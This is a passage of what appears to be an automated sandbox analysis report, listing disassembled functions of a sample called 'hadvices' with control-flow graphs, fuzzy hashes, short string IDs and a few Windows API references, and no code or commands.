                                                      control_flow_graph 1488 1667939-16679cb 1494 16679d1-1667bf6 1488->1494 1495 1667cdb-1667ff7 1488->1495 1545 1667c0f-1667c20 1494->1545 1546 1667bf8-1667c0d 1494->1546 1567 1668010-1668021 1495->1567 1568 1667ff9-166800e 1495->1568 1550 1667c21-1667c99 1545->1550 1546->1550 1562 1667ca0-1667cda 1550->1562 1562->1495 1571 1668022-1668106 1567->1571 1568->1571 1581 166810c-16683d7 1571->1581 1582 16683d8-16683e0 1571->1582 1581->1582
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Teq$Teq
                                                      • API String ID: 0-2938103587
                                                      • Opcode ID: 00ce6c404cacd77374f34048f526edcc80d3a66af641c261f4af08f09ec4bd55
                                                      • Instruction ID: 67d8717a6728dda59a05ac066eccb0f3d9505e2e78fdfb05c049190b3784a678
                                                      • Opcode Fuzzy Hash: 00ce6c404cacd77374f34048f526edcc80d3a66af641c261f4af08f09ec4bd55
                                                      • Instruction Fuzzy Hash: 5D52AA74A01228CFDB64DF65C994BD9BBB2FB89301F1085E9D809A7364CB35AE81CF44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01776168 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$Hq
                                                      • API String ID: 0-2917151738
                                                      • Opcode ID: 6e2da592adbe0f106c5844e8128ef3eeec9edd0f16fc8791296da1ba35cf0680
                                                      • Instruction ID: cd1cb2172c6752b7713c17a1fcd19eae667a477c1fd1df3996c86843fc53cd29
                                                      • Opcode Fuzzy Hash: 6e2da592adbe0f106c5844e8128ef3eeec9edd0f16fc8791296da1ba35cf0680
                                                      • Instruction Fuzzy Hash: 9D128F70A006198FEB18DF69D954BAEBBF2BF88310F248169E505DB359EB34DD41CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177EDF0 Relevance: .7, Instructions: 714COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5218cc211b4d18ad657abf501b65da8155dac8ce997556e44e0f20cbe1ebb204
                                                      • Instruction ID: 1b81a315ac0e3964311a67811fa006f1fe28306792b157430e33d219bf947830
                                                      • Opcode Fuzzy Hash: 5218cc211b4d18ad657abf501b65da8155dac8ce997556e44e0f20cbe1ebb204
                                                      • Instruction Fuzzy Hash: 5E72BB74E012288FEB64DF69C984BE9FBB2BB49300F1481EAD459A7355DB349E81CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177FA10 Relevance: .3, Instructions: 271COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2acd1827d1c7b21afb8cfcb3b415d2a5b040f1f5af99ab4e7d533968d78c08fd
                                                      • Instruction ID: afd64c4e5a1b9c38f5ed1ac719ee0aa3c8307da1f20a885ad7372b1086a3ebd8
                                                      • Opcode Fuzzy Hash: 2acd1827d1c7b21afb8cfcb3b415d2a5b040f1f5af99ab4e7d533968d78c08fd
                                                      • Instruction Fuzzy Hash: E3D19E74E00218CFEB14DFA5D994B9DBBB2BF89301F1081A9D809AB355DB359E85CF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01776EB8 Relevance: 10.5, Strings: 8, Instructions: 467COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 1776eb8-1776eed 1 1776ef3-1776f16 0->1 2 177731c-1777320 0->2 11 1776fc4-1776fc8 1->11 12 1776f1c-1776f29 1->12 3 1777322-1777336 2->3 4 1777339-1777347 2->4 9 1777349-177735e 4->9 10 17773b8-17773cd 4->10 20 1777365-1777372 9->20 21 1777360-1777363 9->21 22 17773d4-17773e1 10->22 23 17773cf-17773d2 10->23 13 1777010-1777019 11->13 14 1776fca-1776fd8 11->14 26 1776f2b-1776f36 12->26 27 1776f38 12->27 17 177742f 13->17 18 177701f-1777029 13->18 14->13 32 1776fda-1776ff5 14->32 33 1777434-1777464 17->33 18->2 24 177702f-1777038 18->24 28 1777374-17773b5 20->28 21->28 29 17773e3-177741e 22->29 23->29 30 1777047-1777053 24->30 31 177703a-177703f 24->31 34 1776f3a-1776f3c 26->34 27->34 76 1777425-177742c 29->76 30->33 39 1777059-177705f 30->39 31->30 60 1776ff7-1777001 32->60 61 1777003 32->61 51 1777466-177747c 33->51 52 177747d-1777484 33->52 34->11 41 1776f42-1776fa4 34->41 42 1777306-177730a 39->42 43 1777065-1777075 39->43 88 1776fa6 41->88 89 1776faa-1776fc1 41->89 42->17 48 1777310-1777316 42->48 58 1777077-1777087 43->58 59 1777089-177708b 43->59 48->2 48->24 63 177708e-1777094 58->63 59->63 64 1777005-1777007 60->64 61->64 63->42 70 177709a-17770a9 63->70 64->13 71 1777009 64->71 72 1777157-1777182 call 1776d00 * 2 70->72 73 17770af 70->73 71->13 90 177726c-1777286 72->90 91 1777188-177718c 72->91 74 17770b2-17770c3 73->74 74->33 78 17770c9-17770db 74->78 78->33 81 17770e1-17770f9 78->81 144 17770fb call 1777498 81->144 145 17770fb call 1777488 81->145 84 1777101-1777111 84->42 87 1777117-177711a 84->87 92 1777124-1777127 87->92 93 177711c-1777122 87->93 88->89 89->11 90->2 113 177728c-1777290 90->113 91->42 94 1777192-1777196 91->94 92->17 95 177712d-1777130 92->95 93->92 93->95 98 17771be-17771c4 94->98 99 1777198-17771a5 94->99 100 1777132-1777136 95->100 101 1777138-177713b 95->101 103 17771c6-17771ca 98->103 104 17771ff-1777205 98->104 116 17771a7-17771b2 99->116 117 17771b4 99->117 100->101 102 1777141-1777145 100->102 101->17 101->102 102->17 110 177714b-1777151 102->110 103->104 105 17771cc-17771d5 103->105 107 1777207-177720b 104->107 108 1777211-1777217 104->108 111 17771d7-17771dc 105->111 112 17771e4-17771fa 105->112 107->76 107->108 114 1777223-1777225 108->114 115 1777219-177721d 108->115 110->72 110->74 111->112 112->42 118 1777292-177729c call 1775ba8 113->118 119 17772cc-17772d0 113->119 120 1777227-1777230 114->120 121 177725a-177725c 114->121 115->42 115->114 122 17771b6-17771b8 116->122 117->122 118->119 133 177729e-17772b3 118->133 119->76 125 17772d6-17772da 119->125 128 1777232-1777237 120->128 129 177723f-1777255 120->129 121->42 123 1777262-1777269 121->123 122->42 122->98 125->76 130 17772e0-17772ed 125->130 128->129 129->42 135 17772ef-17772fa 130->135 136 17772fc 130->136 133->119 141 17772b5-17772ca 133->141 138 17772fe-1777300 135->138 136->138 138->42 138->76 141->2 141->119 144->84 145->84
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                      • API String ID: 0-2212926057
                                                      • Opcode ID: 9053c134c32814e3f26b47bc36827ad26d39de215d6e94b425606983d96054af
                                                      • Instruction ID: b88722b96bdb1b6aa563a1e01fc5b5f32fd66e40393bc3c84f0bea1ce47dcaa6
                                                      • Opcode Fuzzy Hash: 9053c134c32814e3f26b47bc36827ad26d39de215d6e94b425606983d96054af
                                                      • Instruction Fuzzy Hash: E0124A30A002499FDF29DF68D988A9DFBF2BF48314F148599E919DB261D730ED41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01777850 Relevance: 3.2, Strings: 2, Instructions: 687COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1170 1777850-1777d3e 1245 1777d44-1777d54 1170->1245 1246 1778290-17782c5 1170->1246 1245->1246 1247 1777d5a-1777d6a 1245->1247 1250 17782c7-17782cc 1246->1250 1251 17782d1-17782ef 1246->1251 1247->1246 1249 1777d70-1777d80 1247->1249 1249->1246 1252 1777d86-1777d96 1249->1252 1253 17783b6-17783bb 1250->1253 1264 1778366-1778372 1251->1264 1265 17782f1-17782fb 1251->1265 1252->1246 1254 1777d9c-1777dac 1252->1254 1254->1246 1256 1777db2-1777dc2 1254->1256 1256->1246 1257 1777dc8-1777dd8 1256->1257 1257->1246 1259 1777dde-1777dee 1257->1259 1259->1246 1260 1777df4-1777e04 1259->1260 1260->1246 1261 1777e0a-1777e1a 1260->1261 1261->1246 1263 1777e20-177828f 1261->1263 1270 1778374-1778380 1264->1270 1271 1778389-1778395 1264->1271 1265->1264 1269 17782fd-1778309 1265->1269 1276 177832e-1778331 1269->1276 1277 177830b-1778316 1269->1277 1270->1271 1279 1778382-1778387 1270->1279 1280 1778397-17783a3 1271->1280 1281 17783ac-17783ae 1271->1281 1282 1778333-177833f 1276->1282 1283 1778348-1778354 1276->1283 1277->1276 1290 1778318-1778322 1277->1290 1279->1253 1280->1281 1292 17783a5-17783aa 1280->1292 1281->1253 1358 17783b0 call 1778849 1281->1358 1282->1283 1295 1778341-1778346 1282->1295 1284 1778356-177835d 1283->1284 1285 17783bc-17783d4 1283->1285 1284->1285 1289 177835f-1778364 1284->1289 1285->1264 1296 17783d6 1285->1296 1289->1253 1290->1276 1298 1778324-1778329 1290->1298 1292->1253 1295->1253 1298->1253 1358->1253
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $q$$q
                                                      • API String ID: 0-3126353813
                                                      • Opcode ID: 813249f4119901f5fb91c21c8a94eb1542d07ee8c7a30fa460cc15e83420ecfa
                                                      • Instruction ID: b8dcb5eabd2923b65b5dec054635d47d7f98f76bb0f22b984dabffb4c3a99508
                                                      • Opcode Fuzzy Hash: 813249f4119901f5fb91c21c8a94eb1542d07ee8c7a30fa460cc15e83420ecfa
                                                      • Instruction Fuzzy Hash: FE52F134E002198FEB64DBA8C854B9EBB72FF98301F1081A9D10A6B7A4DF355D86DF51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01778849 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q$4'q
                                                      • API String ID: 0-1467158625
                                                      • Opcode ID: 3a111ee88e5b1b55ab8446d524236dc40643beadabb47bf76e03a93d23f539d4
                                                      • Instruction ID: 5d3a9c841820c775af6a6010bb546b0c268d880ed9ec96ab5bb10d6271f2065f
                                                      • Opcode Fuzzy Hash: 3a111ee88e5b1b55ab8446d524236dc40643beadabb47bf76e03a93d23f539d4
                                                      • Instruction Fuzzy Hash: 52B14F703056018FEF199B2DC96CB39BAAAEF85740F1940AAE512CF3B1EA25CC41C753
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01775700 Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Hq$Hq
                                                      • API String ID: 0-925789375
                                                      • Opcode ID: defdc2d18c909df930d097a815f910c6b2eeec7221fa8e2b3f62e1cbdbd3ff08
                                                      • Instruction ID: 3606aeb7dffb07aeb0ae1ad25b85bd1c24930686768b747887c561957ccd8b41
                                                      • Opcode Fuzzy Hash: defdc2d18c909df930d097a815f910c6b2eeec7221fa8e2b3f62e1cbdbd3ff08
                                                      • Instruction Fuzzy Hash: 6091BF317002058FDF199F28D958B6EBBE2BF88214F148468E946CB395DB34DC42CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01775C60 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,q$,q
                                                      • API String ID: 0-1667412543
                                                      • Opcode ID: fe311769aed72c2c9a99d6adc8c6cf38126497cf41de6871d38b229582dfff77
                                                      • Instruction ID: 459e0bfa9db92b3a6d1e886f7074e5e13c18155080bc61a4dc55c65211fcb712
                                                      • Opcode Fuzzy Hash: fe311769aed72c2c9a99d6adc8c6cf38126497cf41de6871d38b229582dfff77
                                                      • Instruction Fuzzy Hash: C3818E34B005058FDF14CF6DC888A6AFBB2BF89214F5489A9D516DB365DB31EC42CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017793F0 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'q$4'q
                                                      • API String ID: 0-1467158625
                                                      • Opcode ID: fc100348c2b4271fbda00bbb70a07c0b4e004d226a1922b8ad4a4418907952bb
                                                      • Instruction ID: 08093a321e855062be6227bb7441ee757ad10856e31fa355befed2c4dec16c5b
                                                      • Opcode Fuzzy Hash: fc100348c2b4271fbda00bbb70a07c0b4e004d226a1922b8ad4a4418907952bb
                                                      • Instruction Fuzzy Hash: 925180307012159FDF05DF69C884B6BBBEAEF88364F188065EA08CB255EB71CD41CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01773480 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Xq$Xq
                                                      • API String ID: 0-1556399337
                                                      • Opcode ID: fa388fed81b98a9cd9c96b6f8d2e46773a94f3e9c071e22ffad4f6a62adf2aa9
                                                      • Instruction ID: a3ee0e61738b7a82245b81539e46c55b568c6c75c92a45dee6701035ed15d1e6
                                                      • Opcode Fuzzy Hash: fa388fed81b98a9cd9c96b6f8d2e46773a94f3e9c071e22ffad4f6a62adf2aa9
                                                      • Instruction Fuzzy Hash: 3531D835B003258BEF2D56B9599427EE6E6BBC4211F28403DD917C3384DF75CC45A7A1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01662128 Relevance: 1.7, APIs: 1, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4492e08b698534dfe36f68ee6f0699d050a35dccef1d3932e43664e36d393259
                                                      • Instruction ID: 85108d59b93476b7182213173ed39b904e2c67584217986474d736cf5175d8ca
                                                      • Opcode Fuzzy Hash: 4492e08b698534dfe36f68ee6f0699d050a35dccef1d3932e43664e36d393259
                                                      • Instruction Fuzzy Hash: 06917A71A007058FE724DF2AD86475ABBFAFF88200F04892DD54AD7B40DB75E946CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01770C8F Relevance: 1.7, Strings: 1, Instructions: 416COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LRq
                                                      • API String ID: 0-3187445251
                                                      • Opcode ID: b40c588d25c0d2075f64f5cf5ee103b62efcafe3fca07b0ee70e82e721af0642
                                                      • Instruction ID: dc0a5fea00ad7a743b02ab4c38baeee87667e832a62ffa269c5609dfa0c458d5
                                                      • Opcode Fuzzy Hash: b40c588d25c0d2075f64f5cf5ee103b62efcafe3fca07b0ee70e82e721af0642
                                                      • Instruction Fuzzy Hash: 5522F974A00219CFCB64EF65E984ADDBBB2FF48302F1081A5D819A7358DB346E86CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01770CA0 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LRq
                                                      • API String ID: 0-3187445251
                                                      • Opcode ID: dc105fa6f818e2b5e7167abda8036b96ecf0846daabb097400149f0ada8db4bc
                                                      • Instruction ID: cf8350298d1ce0545c44e74420839abccf5779d68a5265fab22807473b6107f5
                                                      • Opcode Fuzzy Hash: dc105fa6f818e2b5e7167abda8036b96ecf0846daabb097400149f0ada8db4bc
                                                      • Instruction Fuzzy Hash: 1622F974A00219CFCB64EF65E984ADDBBB2FF48302F1081A5D819A7358DB346E86CF55
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016610E8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 016623E2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: db9a2c67e2998bd8bf4e1bf7bd8f16d1acf369bfef31fa88207d12f2eac59519
                                                      • Instruction ID: d7f7b9168aa25621602b86d3b428215820de1977c9e4ab2c78dfb8de164204f5
                                                      • Opcode Fuzzy Hash: db9a2c67e2998bd8bf4e1bf7bd8f16d1acf369bfef31fa88207d12f2eac59519
                                                      • Instruction Fuzzy Hash: 931103B6D003499FDB24DF9AD844A9EFBF8EB48310F10842EE919A7300C775A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01662370 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 016623E2
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 42836cb2fd9f9038fa04f9c3109c92fd082eaac47931a26f897ec92db33c404d
                                                      • Instruction ID: 76d4b3e33b0e897505568ab8ce68cc4c696d2cd2c119205faeb658ec10cc548d
                                                      • Opcode Fuzzy Hash: 42836cb2fd9f9038fa04f9c3109c92fd082eaac47931a26f897ec92db33c404d
                                                      • Instruction Fuzzy Hash: 7D1100B6D003498FDB24CF9AD845ADEFBF4EB88310F10842ED919A7200C379A945CFA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016661A9 Relevance: 1.5, APIs: 1, Instructions: 47comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 01666205
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: 5788bdf62aa8e05643d1c2bc43295367cc73e61ade7207b17dd64181e7b3d0bd
                                                      • Instruction ID: 45bd44b4a6db930bd4283068adc64cb915b9cdfb922d3bf9dc67dabaadd341fc
                                                      • Opcode Fuzzy Hash: 5788bdf62aa8e05643d1c2bc43295367cc73e61ade7207b17dd64181e7b3d0bd
                                                      • Instruction Fuzzy Hash: 991100B5C003488FDB20DF9AE845BDEFBF8EB48324F20841AD559A7210C379A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166539C Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,016666EF), ref: 016674ED
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: DispatchMessage
                                                      • String ID:
                                                      • API String ID: 2061451462-0
                                                      • Opcode ID: 94aafb03a8aebe5ad6a8c16ee7b0680d84aec697639ca61b58be4f4cbe920ac1
                                                      • Instruction ID: 1ef6cee5ddf2f669611e954fa529a5f459564365b187f8a2d3342afd423b8978
                                                      • Opcode Fuzzy Hash: 94aafb03a8aebe5ad6a8c16ee7b0680d84aec697639ca61b58be4f4cbe920ac1
                                                      • Instruction Fuzzy Hash: C811F2B5C047499FDB20DF9AE844B9EFBF8EB48324F10842AD519A3310D378A545CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016652F0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleInitialize.OLE32(00000000), ref: 01666205
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: Initialize
                                                      • String ID:
                                                      • API String ID: 2538663250-0
                                                      • Opcode ID: b155e41ea6274572f8d7b125ac1380ad490afd40c7b4388eeed7f4accbc8f302
                                                      • Instruction ID: bf4d1e1f313c210f3d5caabfcdbb05a7e5cc4adf1a78570914c546738f196e5f
                                                      • Opcode Fuzzy Hash: b155e41ea6274572f8d7b125ac1380ad490afd40c7b4388eeed7f4accbc8f302
                                                      • Instruction Fuzzy Hash: B01115B5C043498FDB20DF9AD945B9EFBF8EB48324F10841AD519A7300D379A945CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01667489 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,016666EF), ref: 016674ED
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2453885450.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1660000_hadvices.jbxd
                                                      Similarity
                                                      • API ID: DispatchMessage
                                                      • String ID:
                                                      • API String ID: 2061451462-0
                                                      • Opcode ID: b2950a151285781b2b0b5c8b4f6e54f7b77fc24170744fa0f6a2b6db2bd898ad
                                                      • Instruction ID: 6213bf4215cfff936f72158fdfe64b1dc3f0140781613da307d12a1ccd0ddc24
                                                      • Opcode Fuzzy Hash: b2950a151285781b2b0b5c8b4f6e54f7b77fc24170744fa0f6a2b6db2bd898ad
                                                      • Instruction Fuzzy Hash: 2211F2B5C047499FDB20DF9AE844B9EFBF4EB48324F10846AD918A3210D379A544CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177A6B0 Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (oq
                                                      • API String ID: 0-1999159160
                                                      • Opcode ID: 9963f85f3a43db37a15016fe66276d2abfaafd48bdead670e92c15d5bcd557fb
                                                      • Instruction ID: 0beeebe6b7b0124769844baad803b3c43d1db847889d40ecd19d6384d47df953
                                                      • Opcode Fuzzy Hash: 9963f85f3a43db37a15016fe66276d2abfaafd48bdead670e92c15d5bcd557fb
                                                      • Instruction Fuzzy Hash: 0F41C1357002049FDB19AB79D9546AEBBF6FFCC210F184069E916D7395DE319C02CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177A878 Relevance: .4, Instructions: 400COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4a293db408c64090b8142f0edbb85ff0c773ef512c5a29fe63111005ac7b471a
                                                      • Instruction ID: 3e2b53237eb6ef813f4e379bf8f38df0eedce7951a4dbe8a2377b73a97a57128
                                                      • Opcode Fuzzy Hash: 4a293db408c64090b8142f0edbb85ff0c773ef512c5a29fe63111005ac7b471a
                                                      • Instruction Fuzzy Hash: 64F10775A006159FDB05CF6CC584AADBBF6BF88310F2A8499E519AB362CB35EC41CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01777498 Relevance: .2, Instructions: 201COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_1770000_hadvices.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 154776024d12d1b5c5e2c28f85d965f8b9479b91b9c3f76b702c33f90dc8080a
                                                      • Instruction ID: 2dfa831642d4c8f063acb868c99aaa1dcd11e41c820e3ed25cfb86dc9965e00a
                                                      • Opcode Fuzzy Hash: 154776024d12d1b5c5e2c28f85d965f8b9479b91b9c3f76b702c33f90dc8080a
                                                      • Instruction Fuzzy Hash: 7F7108347002458FDF19DF2CC898AA9BBE6AF49710F1944A9E906CB3B5DB71DC41CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0177E087 Relevance: .2, Instructions: 174COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.2454796306.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
